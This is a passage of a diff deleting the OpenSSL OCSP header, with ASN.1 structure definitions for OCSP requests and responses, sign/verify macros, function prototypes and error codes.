-#include <openssl/safestack.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Various flags and values */
-
-#define OCSP_DEFAULT_NONCE_LENGTH	16
-
-#define OCSP_NOCERTS			0x1
-#define OCSP_NOINTERN			0x2
-#define OCSP_NOSIGS			0x4
-#define OCSP_NOCHAIN			0x8
-#define OCSP_NOVERIFY			0x10
-#define OCSP_NOEXPLICIT			0x20
-#define OCSP_NOCASIGN			0x40
-#define OCSP_NODELEGATED		0x80
-#define OCSP_NOCHECKS			0x100
-#define OCSP_TRUSTOTHER			0x200
-#define OCSP_RESPID_KEY			0x400
-#define OCSP_NOTIME			0x800
-
-/*   CertID ::= SEQUENCE {
- *       hashAlgorithm            AlgorithmIdentifier,
- *       issuerNameHash     OCTET STRING, -- Hash of Issuer's DN
- *       issuerKeyHash      OCTET STRING, -- Hash of Issuers public key (excluding the tag & length fields)
- *       serialNumber       CertificateSerialNumber }
- */
-typedef struct ocsp_cert_id_st {
-	X509_ALGOR *hashAlgorithm;
-	ASN1_OCTET_STRING *issuerNameHash;
-	ASN1_OCTET_STRING *issuerKeyHash;
-	ASN1_INTEGER *serialNumber;
-} OCSP_CERTID;
-
-DECLARE_STACK_OF(OCSP_CERTID)
-
-/*   Request ::=     SEQUENCE {
- *       reqCert                    CertID,
- *       singleRequestExtensions    [0] EXPLICIT Extensions OPTIONAL }
- */
-typedef struct ocsp_one_request_st {
-	OCSP_CERTID *reqCert;
-	STACK_OF(X509_EXTENSION) *singleRequestExtensions;
-} OCSP_ONEREQ;
-
-DECLARE_STACK_OF(OCSP_ONEREQ)
-
-
-/*   TBSRequest      ::=     SEQUENCE {
- *       version             [0] EXPLICIT Version DEFAULT v1,
- *       requestorName       [1] EXPLICIT GeneralName OPTIONAL,
- *       requestList             SEQUENCE OF Request,
- *       requestExtensions   [2] EXPLICIT Extensions OPTIONAL }
- */
-typedef struct ocsp_req_info_st {
-	ASN1_INTEGER *version;
-	GENERAL_NAME *requestorName;
-	STACK_OF(OCSP_ONEREQ) *requestList;
-	STACK_OF(X509_EXTENSION) *requestExtensions;
-} OCSP_REQINFO;
-
-/*   Signature       ::=     SEQUENCE {
- *       signatureAlgorithm   AlgorithmIdentifier,
- *       signature            BIT STRING,
- *       certs                [0] EXPLICIT SEQUENCE OF Certificate OPTIONAL }
- */
-typedef struct ocsp_signature_st {
-	X509_ALGOR *signatureAlgorithm;
-	ASN1_BIT_STRING *signature;
-	STACK_OF(X509) *certs;
-} OCSP_SIGNATURE;
-
-/*   OCSPRequest     ::=     SEQUENCE {
- *       tbsRequest                  TBSRequest,
- *       optionalSignature   [0]     EXPLICIT Signature OPTIONAL }
- */
-typedef struct ocsp_request_st {
-	OCSP_REQINFO *tbsRequest;
-	OCSP_SIGNATURE *optionalSignature; /* OPTIONAL */
-} OCSP_REQUEST;
-
-/*   OCSPResponseStatus ::= ENUMERATED {
- *       successful            (0),      --Response has valid confirmations
- *       malformedRequest      (1),      --Illegal confirmation request
- *       internalError         (2),      --Internal error in issuer
- *       tryLater              (3),      --Try again later
- *                                       --(4) is not used
- *       sigRequired           (5),      --Must sign the request
- *       unauthorized          (6)       --Request unauthorized
- *   }
- */
-#define OCSP_RESPONSE_STATUS_SUCCESSFUL		0
-#define OCSP_RESPONSE_STATUS_MALFORMEDREQUEST	1
-#define OCSP_RESPONSE_STATUS_INTERNALERROR	2
-#define OCSP_RESPONSE_STATUS_TRYLATER		3
-#define OCSP_RESPONSE_STATUS_SIGREQUIRED	5
-#define OCSP_RESPONSE_STATUS_UNAUTHORIZED	6
-
-/*   ResponseBytes ::=       SEQUENCE {
- *       responseType   OBJECT IDENTIFIER,
- *       response       OCTET STRING }
- */
-typedef struct ocsp_resp_bytes_st {
-	ASN1_OBJECT *responseType;
-	ASN1_OCTET_STRING *response;
-} OCSP_RESPBYTES;
-
-/*   OCSPResponse ::= SEQUENCE {
- *      responseStatus         OCSPResponseStatus,
- *      responseBytes          [0] EXPLICIT ResponseBytes OPTIONAL }
- */
-struct ocsp_response_st {
-	ASN1_ENUMERATED *responseStatus;
-	OCSP_RESPBYTES  *responseBytes;
-};
-
-/*   ResponderID ::= CHOICE {
- *      byName   [1] Name,
- *      byKey    [2] KeyHash }
- */
-#define V_OCSP_RESPID_NAME 0
-#define V_OCSP_RESPID_KEY  1
-struct ocsp_responder_id_st {
-	int type;
-	union {
-		X509_NAME* byName;
-		ASN1_OCTET_STRING *byKey;
-	} value;
-};
-
-DECLARE_STACK_OF(OCSP_RESPID)
-OCSP_RESPID *OCSP_RESPID_new(void);
-void OCSP_RESPID_free(OCSP_RESPID *a);
-OCSP_RESPID *d2i_OCSP_RESPID(OCSP_RESPID **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPID(OCSP_RESPID *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_RESPID_it;
-
-/*   KeyHash ::= OCTET STRING --SHA-1 hash of responder's public key
- *                            --(excluding the tag and length fields)
- */
-
-/*   RevokedInfo ::= SEQUENCE {
- *       revocationTime              GeneralizedTime,
- *       revocationReason    [0]     EXPLICIT CRLReason OPTIONAL }
- */
-typedef struct ocsp_revoked_info_st {
-	ASN1_GENERALIZEDTIME *revocationTime;
-	ASN1_ENUMERATED *revocationReason;
-} OCSP_REVOKEDINFO;
-
-/*   CertStatus ::= CHOICE {
- *       good                [0]     IMPLICIT NULL,
- *       revoked             [1]     IMPLICIT RevokedInfo,
- *       unknown             [2]     IMPLICIT UnknownInfo }
- */
-#define V_OCSP_CERTSTATUS_GOOD    0
-#define V_OCSP_CERTSTATUS_REVOKED 1
-#define V_OCSP_CERTSTATUS_UNKNOWN 2
-typedef struct ocsp_cert_status_st {
-	int type;
-	union {
-		ASN1_NULL *good;
-		OCSP_REVOKEDINFO *revoked;
-		ASN1_NULL *unknown;
-	} value;
-} OCSP_CERTSTATUS;
-
-/*   SingleResponse ::= SEQUENCE {
- *      certID                       CertID,
- *      certStatus                   CertStatus,
- *      thisUpdate                   GeneralizedTime,
- *      nextUpdate           [0]     EXPLICIT GeneralizedTime OPTIONAL,
- *      singleExtensions     [1]     EXPLICIT Extensions OPTIONAL }
- */
-typedef struct ocsp_single_response_st {
-	OCSP_CERTID *certId;
-	OCSP_CERTSTATUS *certStatus;
-	ASN1_GENERALIZEDTIME *thisUpdate;
-	ASN1_GENERALIZEDTIME *nextUpdate;
-	STACK_OF(X509_EXTENSION) *singleExtensions;
-} OCSP_SINGLERESP;
-
-DECLARE_STACK_OF(OCSP_SINGLERESP)
-
-/*   ResponseData ::= SEQUENCE {
- *      version              [0] EXPLICIT Version DEFAULT v1,
- *      responderID              ResponderID,
- *      producedAt               GeneralizedTime,
- *      responses                SEQUENCE OF SingleResponse,
- *      responseExtensions   [1] EXPLICIT Extensions OPTIONAL }
- */
-typedef struct ocsp_response_data_st {
-	ASN1_INTEGER *version;
-	OCSP_RESPID  *responderId;
-	ASN1_GENERALIZEDTIME *producedAt;
-	STACK_OF(OCSP_SINGLERESP) *responses;
-	STACK_OF(X509_EXTENSION) *responseExtensions;
-} OCSP_RESPDATA;
-
-/*   BasicOCSPResponse       ::= SEQUENCE {
- *      tbsResponseData      ResponseData,
- *      signatureAlgorithm   AlgorithmIdentifier,
- *      signature            BIT STRING,
- *      certs                [0] EXPLICIT SEQUENCE OF Certificate OPTIONAL }
- */
-  /* Note 1:
-     The value for "signature" is specified in the OCSP rfc2560 as follows:
-     "The value for the signature SHALL be computed on the hash of the DER
-     encoding ResponseData."  This means that you must hash the DER-encoded
-     tbsResponseData, and then run it through a crypto-signing function, which
-     will (at least w/RSA) do a hash-'n'-private-encrypt operation.  This seems
-     a bit odd, but that's the spec.  Also note that the data structures do not
-     leave anywhere to independently specify the algorithm used for the initial
-     hash. So, we look at the signature-specification algorithm, and try to do
-     something intelligent.	-- Kathy Weinhold, CertCo */
-  /* Note 2:
-     It seems that the mentioned passage from RFC 2560 (section 4.2.1) is open
-     for interpretation.  I've done tests against another responder, and found
-     that it doesn't do the double hashing that the RFC seems to say one
-     should.  Therefore, all relevant functions take a flag saying which
-     variant should be used.	-- Richard Levitte, OpenSSL team and CeloCom */
-typedef struct ocsp_basic_response_st {
-	OCSP_RESPDATA *tbsResponseData;
-	X509_ALGOR *signatureAlgorithm;
-	ASN1_BIT_STRING *signature;
-	STACK_OF(X509) *certs;
-} OCSP_BASICRESP;
-
-/*
- *   CRLReason ::= ENUMERATED {
- *        unspecified             (0),
- *        keyCompromise           (1),
- *        cACompromise            (2),
- *        affiliationChanged      (3),
- *        superseded              (4),
- *        cessationOfOperation    (5),
- *        certificateHold         (6),
- *        removeFromCRL           (8) }
- */
-#define OCSP_REVOKED_STATUS_NOSTATUS			-1
-#define OCSP_REVOKED_STATUS_UNSPECIFIED			0
-#define OCSP_REVOKED_STATUS_KEYCOMPROMISE		1
-#define OCSP_REVOKED_STATUS_CACOMPROMISE		2
-#define OCSP_REVOKED_STATUS_AFFILIATIONCHANGED		3
-#define OCSP_REVOKED_STATUS_SUPERSEDED			4
-#define OCSP_REVOKED_STATUS_CESSATIONOFOPERATION	5
-#define OCSP_REVOKED_STATUS_CERTIFICATEHOLD		6
-#define OCSP_REVOKED_STATUS_REMOVEFROMCRL		8
-
-/* CrlID ::= SEQUENCE {
- *     crlUrl               [0]     EXPLICIT IA5String OPTIONAL,
- *     crlNum               [1]     EXPLICIT INTEGER OPTIONAL,
- *     crlTime              [2]     EXPLICIT GeneralizedTime OPTIONAL }
- */
-typedef struct ocsp_crl_id_st {
-	ASN1_IA5STRING *crlUrl;
-	ASN1_INTEGER *crlNum;
-	ASN1_GENERALIZEDTIME *crlTime;
-} OCSP_CRLID;
-
-/* ServiceLocator ::= SEQUENCE {
- *      issuer    Name,
- *      locator   AuthorityInfoAccessSyntax OPTIONAL }
- */
-typedef struct ocsp_service_locator_st {
-	X509_NAME* issuer;
-	STACK_OF(ACCESS_DESCRIPTION) *locator;
-} OCSP_SERVICELOC;
-
-#define PEM_STRING_OCSP_REQUEST	"OCSP REQUEST"
-#define PEM_STRING_OCSP_RESPONSE "OCSP RESPONSE"
-
-#define	PEM_read_bio_OCSP_REQUEST(bp,x,cb) \
-    (OCSP_REQUEST *)PEM_ASN1_read_bio((char *(*)())d2i_OCSP_REQUEST, \
-	PEM_STRING_OCSP_REQUEST,bp,(char **)x,cb,NULL)
-
-#define	PEM_read_bio_OCSP_RESPONSE(bp,x,cb) \
-    (OCSP_RESPONSE *)PEM_ASN1_read_bio((char *(*)())d2i_OCSP_RESPONSE, \
-	PEM_STRING_OCSP_RESPONSE,bp,(char **)x,cb,NULL)
-
-#define PEM_write_bio_OCSP_REQUEST(bp,o) \
-    PEM_ASN1_write_bio((int (*)())i2d_OCSP_REQUEST,PEM_STRING_OCSP_REQUEST,\
-	bp,(char *)o, NULL,NULL,0,NULL,NULL)
-
-#define PEM_write_bio_OCSP_RESPONSE(bp,o) \
-    PEM_ASN1_write_bio((int (*)())i2d_OCSP_RESPONSE,PEM_STRING_OCSP_RESPONSE,\
-	bp,(char *)o, NULL,NULL,0,NULL,NULL)
-
-#define OCSP_REQUEST_sign(o,pkey,md) \
-    ASN1_item_sign(&OCSP_REQINFO_it, \
-	o->optionalSignature->signatureAlgorithm,NULL, \
-	o->optionalSignature->signature,o->tbsRequest,pkey,md)
-
-#define OCSP_BASICRESP_sign(o,pkey,md,d) \
-    ASN1_item_sign(&OCSP_RESPDATA_it,o->signatureAlgorithm,NULL, \
-	o->signature,o->tbsResponseData,pkey,md)
-
-#define OCSP_REQUEST_verify(a,r) \
-    ASN1_item_verify(&OCSP_REQINFO_it, \
-	a->optionalSignature->signatureAlgorithm, \
-	a->optionalSignature->signature,a->tbsRequest,r)
-
-#define OCSP_BASICRESP_verify(a,r,d) \
-    ASN1_item_verify(&OCSP_RESPDATA_it, \
-	a->signatureAlgorithm,a->signature,a->tbsResponseData,r)
-
-#define ASN1_BIT_STRING_digest(data,type,md,len) \
-    ASN1_item_digest(&ASN1_BIT_STRING_it,type,data,md,len)
-
-#define OCSP_CERTSTATUS_dup(cs) \
-	ASN1_item_dup(&OCSP_CERTSTATUS_it, cs)
-
-OCSP_CERTID *OCSP_CERTID_dup(OCSP_CERTID *id);
-
-OCSP_RESPONSE *OCSP_sendreq_bio(BIO *b, char *path, OCSP_REQUEST *req);
-OCSP_REQ_CTX *OCSP_sendreq_new(BIO *io, char *path, OCSP_REQUEST *req,
-	    int maxline);
-int	OCSP_sendreq_nbio(OCSP_RESPONSE **presp, OCSP_REQ_CTX *rctx);
-void	OCSP_REQ_CTX_free(OCSP_REQ_CTX *rctx);
-int	OCSP_REQ_CTX_set1_req(OCSP_REQ_CTX *rctx, OCSP_REQUEST *req);
-int	OCSP_REQ_CTX_add1_header(OCSP_REQ_CTX *rctx, const char *name,
-	    const char *value);
-
-OCSP_CERTID *OCSP_cert_to_id(const EVP_MD *dgst, X509 *subject, X509 *issuer);
-
-OCSP_CERTID *OCSP_cert_id_new(const EVP_MD *dgst, X509_NAME *issuerName,
-	    ASN1_BIT_STRING* issuerKey, ASN1_INTEGER *serialNumber);
-
-OCSP_ONEREQ *OCSP_request_add0_id(OCSP_REQUEST *req, OCSP_CERTID *cid);
-
-int	OCSP_request_add1_nonce(OCSP_REQUEST *req, unsigned char *val, int len);
-int	OCSP_basic_add1_nonce(OCSP_BASICRESP *resp, unsigned char *val, int len);
-int	OCSP_check_nonce(OCSP_REQUEST *req, OCSP_BASICRESP *bs);
-int	OCSP_copy_nonce(OCSP_BASICRESP *resp, OCSP_REQUEST *req);
-
-int	OCSP_request_set1_name(OCSP_REQUEST *req, X509_NAME *nm);
-int	OCSP_request_add1_cert(OCSP_REQUEST *req, X509 *cert);
-
-int	OCSP_request_sign(OCSP_REQUEST *req, X509 *signer, EVP_PKEY *key,
-	    const EVP_MD *dgst, STACK_OF(X509) *certs, unsigned long flags);
-
-int	OCSP_response_status(OCSP_RESPONSE *resp);
-OCSP_BASICRESP *OCSP_response_get1_basic(OCSP_RESPONSE *resp);
-
-int	OCSP_resp_count(OCSP_BASICRESP *bs);
-OCSP_SINGLERESP *OCSP_resp_get0(OCSP_BASICRESP *bs, int idx);
-int	OCSP_resp_find(OCSP_BASICRESP *bs, OCSP_CERTID *id, int last);
-int	OCSP_single_get0_status(OCSP_SINGLERESP *single, int *reason,
-	    ASN1_GENERALIZEDTIME **revtime, ASN1_GENERALIZEDTIME **thisupd,
-	    ASN1_GENERALIZEDTIME **nextupd);
-int	OCSP_resp_find_status(OCSP_BASICRESP *bs, OCSP_CERTID *id, int *status,
-	    int *reason, ASN1_GENERALIZEDTIME **revtime,
-	    ASN1_GENERALIZEDTIME **thisupd, ASN1_GENERALIZEDTIME **nextupd);
-int	OCSP_check_validity(ASN1_GENERALIZEDTIME *thisupd,
-	    ASN1_GENERALIZEDTIME *nextupd, long sec, long maxsec);
-
-int	OCSP_request_verify(OCSP_REQUEST *req, STACK_OF(X509) *certs,
-	    X509_STORE *store, unsigned long flags);
-
-int	OCSP_parse_url(char *url, char **phost, char **pport, char **ppath,
-	    int *pssl);
-
-int	OCSP_id_issuer_cmp(OCSP_CERTID *a, OCSP_CERTID *b);
-int	OCSP_id_cmp(OCSP_CERTID *a, OCSP_CERTID *b);
-
-int	OCSP_request_onereq_count(OCSP_REQUEST *req);
-OCSP_ONEREQ *OCSP_request_onereq_get0(OCSP_REQUEST *req, int i);
-OCSP_CERTID *OCSP_onereq_get0_id(OCSP_ONEREQ *one);
-int	OCSP_id_get0_info(ASN1_OCTET_STRING **piNameHash, ASN1_OBJECT **pmd,
-	    ASN1_OCTET_STRING **pikeyHash, ASN1_INTEGER **pserial,
-	    OCSP_CERTID *cid);
-int	OCSP_request_is_signed(OCSP_REQUEST *req);
-OCSP_RESPONSE *OCSP_response_create(int status, OCSP_BASICRESP *bs);
-OCSP_SINGLERESP *OCSP_basic_add1_status(OCSP_BASICRESP *rsp, OCSP_CERTID *cid,
-	    int status, int reason, ASN1_TIME *revtime, ASN1_TIME *thisupd,
-	    ASN1_TIME *nextupd);
-int	OCSP_basic_add1_cert(OCSP_BASICRESP *resp, X509 *cert);
-int	OCSP_basic_sign(OCSP_BASICRESP *brsp, X509 *signer, EVP_PKEY *key,
-	    const EVP_MD *dgst, STACK_OF(X509) *certs, unsigned long flags);
-
-X509_EXTENSION *OCSP_crlID_new(char *url, long *n, char *tim);
-
-X509_EXTENSION *OCSP_accept_responses_new(char **oids);
-
-X509_EXTENSION *OCSP_archive_cutoff_new(char* tim);
-
-X509_EXTENSION *OCSP_url_svcloc_new(X509_NAME* issuer, char **urls);
-
-int	OCSP_REQUEST_get_ext_count(OCSP_REQUEST *x);
-int	OCSP_REQUEST_get_ext_by_NID(OCSP_REQUEST *x, int nid, int lastpos);
-int	OCSP_REQUEST_get_ext_by_OBJ(OCSP_REQUEST *x, ASN1_OBJECT *obj,
-	    int lastpos);
-int	OCSP_REQUEST_get_ext_by_critical(OCSP_REQUEST *x, int crit,
-	    int lastpos);
-X509_EXTENSION *OCSP_REQUEST_get_ext(OCSP_REQUEST *x, int loc);
-X509_EXTENSION *OCSP_REQUEST_delete_ext(OCSP_REQUEST *x, int loc);
-void *OCSP_REQUEST_get1_ext_d2i(OCSP_REQUEST *x, int nid, int *crit, int *idx);
-int	OCSP_REQUEST_add1_ext_i2d(OCSP_REQUEST *x, int nid, void *value,
-	    int crit, unsigned long flags);
-int	OCSP_REQUEST_add_ext(OCSP_REQUEST *x, X509_EXTENSION *ex, int loc);
-
-int	OCSP_ONEREQ_get_ext_count(OCSP_ONEREQ *x);
-int	OCSP_ONEREQ_get_ext_by_NID(OCSP_ONEREQ *x, int nid, int lastpos);
-int	OCSP_ONEREQ_get_ext_by_OBJ(OCSP_ONEREQ *x, ASN1_OBJECT *obj,
-	    int lastpos);
-int	OCSP_ONEREQ_get_ext_by_critical(OCSP_ONEREQ *x, int crit, int lastpos);
-X509_EXTENSION *OCSP_ONEREQ_get_ext(OCSP_ONEREQ *x, int loc);
-X509_EXTENSION *OCSP_ONEREQ_delete_ext(OCSP_ONEREQ *x, int loc);
-void *OCSP_ONEREQ_get1_ext_d2i(OCSP_ONEREQ *x, int nid, int *crit, int *idx);
-int	OCSP_ONEREQ_add1_ext_i2d(OCSP_ONEREQ *x, int nid, void *value, int crit,
-	    unsigned long flags);
-int	OCSP_ONEREQ_add_ext(OCSP_ONEREQ *x, X509_EXTENSION *ex, int loc);
-
-int	OCSP_BASICRESP_get_ext_count(OCSP_BASICRESP *x);
-int	OCSP_BASICRESP_get_ext_by_NID(OCSP_BASICRESP *x, int nid, int lastpos);
-int	OCSP_BASICRESP_get_ext_by_OBJ(OCSP_BASICRESP *x, ASN1_OBJECT *obj,
-	    int lastpos);
-int	OCSP_BASICRESP_get_ext_by_critical(OCSP_BASICRESP *x, int crit,
-	    int lastpos);
-X509_EXTENSION *OCSP_BASICRESP_get_ext(OCSP_BASICRESP *x, int loc);
-X509_EXTENSION *OCSP_BASICRESP_delete_ext(OCSP_BASICRESP *x, int loc);
-void *OCSP_BASICRESP_get1_ext_d2i(OCSP_BASICRESP *x, int nid, int *crit,
-	    int *idx);
-int	OCSP_BASICRESP_add1_ext_i2d(OCSP_BASICRESP *x, int nid, void *value,
-	    int crit, unsigned long flags);
-int	OCSP_BASICRESP_add_ext(OCSP_BASICRESP *x, X509_EXTENSION *ex, int loc);
-
-int	OCSP_SINGLERESP_get_ext_count(OCSP_SINGLERESP *x);
-int	OCSP_SINGLERESP_get_ext_by_NID(OCSP_SINGLERESP *x, int nid,
-	    int lastpos);
-int	OCSP_SINGLERESP_get_ext_by_OBJ(OCSP_SINGLERESP *x, ASN1_OBJECT *obj,
-	    int lastpos);
-int	OCSP_SINGLERESP_get_ext_by_critical(OCSP_SINGLERESP *x, int crit,
-	    int lastpos);
-X509_EXTENSION *OCSP_SINGLERESP_get_ext(OCSP_SINGLERESP *x, int loc);
-X509_EXTENSION *OCSP_SINGLERESP_delete_ext(OCSP_SINGLERESP *x, int loc);
-void *OCSP_SINGLERESP_get1_ext_d2i(OCSP_SINGLERESP *x, int nid, int *crit,
-	    int *idx);
-int	OCSP_SINGLERESP_add1_ext_i2d(OCSP_SINGLERESP *x, int nid, void *value,
-	    int crit, unsigned long flags);
-int	OCSP_SINGLERESP_add_ext(OCSP_SINGLERESP *x, X509_EXTENSION *ex,
-	    int loc);
-
-OCSP_SINGLERESP *OCSP_SINGLERESP_new(void);
-void OCSP_SINGLERESP_free(OCSP_SINGLERESP *a);
-OCSP_SINGLERESP *d2i_OCSP_SINGLERESP(OCSP_SINGLERESP **a, const unsigned char **in, long len);
-int i2d_OCSP_SINGLERESP(OCSP_SINGLERESP *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_SINGLERESP_it;
-OCSP_CERTSTATUS *OCSP_CERTSTATUS_new(void);
-void OCSP_CERTSTATUS_free(OCSP_CERTSTATUS *a);
-OCSP_CERTSTATUS *d2i_OCSP_CERTSTATUS(OCSP_CERTSTATUS **a, const unsigned char **in, long len);
-int i2d_OCSP_CERTSTATUS(OCSP_CERTSTATUS *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_CERTSTATUS_it;
-OCSP_REVOKEDINFO *OCSP_REVOKEDINFO_new(void);
-void OCSP_REVOKEDINFO_free(OCSP_REVOKEDINFO *a);
-OCSP_REVOKEDINFO *d2i_OCSP_REVOKEDINFO(OCSP_REVOKEDINFO **a, const unsigned char **in, long len);
-int i2d_OCSP_REVOKEDINFO(OCSP_REVOKEDINFO *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_REVOKEDINFO_it;
-OCSP_BASICRESP *OCSP_BASICRESP_new(void);
-void OCSP_BASICRESP_free(OCSP_BASICRESP *a);
-OCSP_BASICRESP *d2i_OCSP_BASICRESP(OCSP_BASICRESP **a, const unsigned char **in, long len);
-int i2d_OCSP_BASICRESP(OCSP_BASICRESP *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_BASICRESP_it;
-OCSP_RESPDATA *OCSP_RESPDATA_new(void);
-void OCSP_RESPDATA_free(OCSP_RESPDATA *a);
-OCSP_RESPDATA *d2i_OCSP_RESPDATA(OCSP_RESPDATA **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPDATA(OCSP_RESPDATA *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_RESPDATA_it;
-OCSP_RESPID *OCSP_RESPID_new(void);
-void OCSP_RESPID_free(OCSP_RESPID *a);
-OCSP_RESPID *d2i_OCSP_RESPID(OCSP_RESPID **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPID(OCSP_RESPID *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_RESPID_it;
-OCSP_RESPONSE *OCSP_RESPONSE_new(void);
-void OCSP_RESPONSE_free(OCSP_RESPONSE *a);
-OCSP_RESPONSE *d2i_OCSP_RESPONSE(OCSP_RESPONSE **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPONSE(OCSP_RESPONSE *a, unsigned char **out);
-OCSP_RESPONSE *d2i_OCSP_RESPONSE_bio(BIO *bp, OCSP_RESPONSE **a);
-int i2d_OCSP_RESPONSE_bio(BIO *bp, OCSP_RESPONSE *a);
-extern const ASN1_ITEM OCSP_RESPONSE_it;
-OCSP_RESPBYTES *OCSP_RESPBYTES_new(void);
-void OCSP_RESPBYTES_free(OCSP_RESPBYTES *a);
-OCSP_RESPBYTES *d2i_OCSP_RESPBYTES(OCSP_RESPBYTES **a, const unsigned char **in, long len);
-int i2d_OCSP_RESPBYTES(OCSP_RESPBYTES *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_RESPBYTES_it;
-OCSP_ONEREQ *OCSP_ONEREQ_new(void);
-void OCSP_ONEREQ_free(OCSP_ONEREQ *a);
-OCSP_ONEREQ *d2i_OCSP_ONEREQ(OCSP_ONEREQ **a, const unsigned char **in, long len);
-int i2d_OCSP_ONEREQ(OCSP_ONEREQ *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_ONEREQ_it;
-OCSP_CERTID *OCSP_CERTID_new(void);
-void OCSP_CERTID_free(OCSP_CERTID *a);
-OCSP_CERTID *d2i_OCSP_CERTID(OCSP_CERTID **a, const unsigned char **in, long len);
-int i2d_OCSP_CERTID(OCSP_CERTID *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_CERTID_it;
-OCSP_REQUEST *OCSP_REQUEST_new(void);
-void OCSP_REQUEST_free(OCSP_REQUEST *a);
-OCSP_REQUEST *d2i_OCSP_REQUEST(OCSP_REQUEST **a, const unsigned char **in, long len);
-int i2d_OCSP_REQUEST(OCSP_REQUEST *a, unsigned char **out);
-OCSP_REQUEST *d2i_OCSP_REQUEST_bio(BIO *bp, OCSP_REQUEST **a);
-int i2d_OCSP_REQUEST_bio(BIO *bp, OCSP_REQUEST *a);
-extern const ASN1_ITEM OCSP_REQUEST_it;
-OCSP_SIGNATURE *OCSP_SIGNATURE_new(void);
-void OCSP_SIGNATURE_free(OCSP_SIGNATURE *a);
-OCSP_SIGNATURE *d2i_OCSP_SIGNATURE(OCSP_SIGNATURE **a, const unsigned char **in, long len);
-int i2d_OCSP_SIGNATURE(OCSP_SIGNATURE *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_SIGNATURE_it;
-OCSP_REQINFO *OCSP_REQINFO_new(void);
-void OCSP_REQINFO_free(OCSP_REQINFO *a);
-OCSP_REQINFO *d2i_OCSP_REQINFO(OCSP_REQINFO **a, const unsigned char **in, long len);
-int i2d_OCSP_REQINFO(OCSP_REQINFO *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_REQINFO_it;
-OCSP_CRLID *OCSP_CRLID_new(void);
-void OCSP_CRLID_free(OCSP_CRLID *a);
-OCSP_CRLID *d2i_OCSP_CRLID(OCSP_CRLID **a, const unsigned char **in, long len);
-int i2d_OCSP_CRLID(OCSP_CRLID *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_CRLID_it;
-OCSP_SERVICELOC *OCSP_SERVICELOC_new(void);
-void OCSP_SERVICELOC_free(OCSP_SERVICELOC *a);
-OCSP_SERVICELOC *d2i_OCSP_SERVICELOC(OCSP_SERVICELOC **a, const unsigned char **in, long len);
-int i2d_OCSP_SERVICELOC(OCSP_SERVICELOC *a, unsigned char **out);
-extern const ASN1_ITEM OCSP_SERVICELOC_it;
-
-const char *OCSP_response_status_str(long s);
-const char *OCSP_cert_status_str(long s);
-const char *OCSP_crl_reason_str(long s);
-
-int	OCSP_REQUEST_print(BIO *bp, OCSP_REQUEST* a, unsigned long flags);
-int	OCSP_RESPONSE_print(BIO *bp, OCSP_RESPONSE* o, unsigned long flags);
-
-int	OCSP_basic_verify(OCSP_BASICRESP *bs, STACK_OF(X509) *certs,
-	    X509_STORE *st, unsigned long flags);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_OCSP_strings(void);
-
-/* Error codes for the OCSP functions. */
-
-/* Function codes. */
-#define OCSP_F_ASN1_STRING_ENCODE			 100
-#define OCSP_F_D2I_OCSP_NONCE				 102
-#define OCSP_F_OCSP_BASIC_ADD1_STATUS			 103
-#define OCSP_F_OCSP_BASIC_SIGN				 104
-#define OCSP_F_OCSP_BASIC_VERIFY			 105
-#define OCSP_F_OCSP_CERT_ID_NEW				 101
-#define OCSP_F_OCSP_CHECK_DELEGATED			 106
-#define OCSP_F_OCSP_CHECK_IDS				 107
-#define OCSP_F_OCSP_CHECK_ISSUER			 108
-#define OCSP_F_OCSP_CHECK_VALIDITY			 115
-#define OCSP_F_OCSP_MATCH_ISSUERID			 109
-#define OCSP_F_OCSP_PARSE_URL				 114
-#define OCSP_F_OCSP_REQUEST_SIGN			 110
-#define OCSP_F_OCSP_REQUEST_VERIFY			 116
-#define OCSP_F_OCSP_RESPONSE_GET1_BASIC			 111
-#define OCSP_F_OCSP_SENDREQ_BIO				 112
-#define OCSP_F_OCSP_SENDREQ_NBIO			 117
-#define OCSP_F_PARSE_HTTP_LINE1				 118
-#define OCSP_F_REQUEST_VERIFY				 113
-
-/* Reason codes. */
-#define OCSP_R_BAD_DATA					 100
-#define OCSP_R_CERTIFICATE_VERIFY_ERROR			 101
-#define OCSP_R_DIGEST_ERR				 102
-#define OCSP_R_ERROR_IN_NEXTUPDATE_FIELD		 122
-#define OCSP_R_ERROR_IN_THISUPDATE_FIELD		 123
-#define OCSP_R_ERROR_PARSING_URL			 121
-#define OCSP_R_MISSING_OCSPSIGNING_USAGE		 103
-#define OCSP_R_NEXTUPDATE_BEFORE_THISUPDATE		 124
-#define OCSP_R_NOT_BASIC_RESPONSE			 104
-#define OCSP_R_NO_CERTIFICATES_IN_CHAIN			 105
-#define OCSP_R_NO_CONTENT				 106
-#define OCSP_R_NO_PUBLIC_KEY				 107
-#define OCSP_R_NO_RESPONSE_DATA				 108
-#define OCSP_R_NO_REVOKED_TIME				 109
-#define OCSP_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE	 110
-#define OCSP_R_REQUEST_NOT_SIGNED			 128
-#define OCSP_R_RESPONSE_CONTAINS_NO_REVOCATION_DATA	 111
-#define OCSP_R_ROOT_CA_NOT_TRUSTED			 112
-#define OCSP_R_SERVER_READ_ERROR			 113
-#define OCSP_R_SERVER_RESPONSE_ERROR			 114
-#define OCSP_R_SERVER_RESPONSE_PARSE_ERROR		 115
-#define OCSP_R_SERVER_WRITE_ERROR			 116
-#define OCSP_R_SIGNATURE_FAILURE			 117
-#define OCSP_R_SIGNER_CERTIFICATE_NOT_FOUND		 118
-#define OCSP_R_STATUS_EXPIRED				 125
-#define OCSP_R_STATUS_NOT_YET_VALID			 126
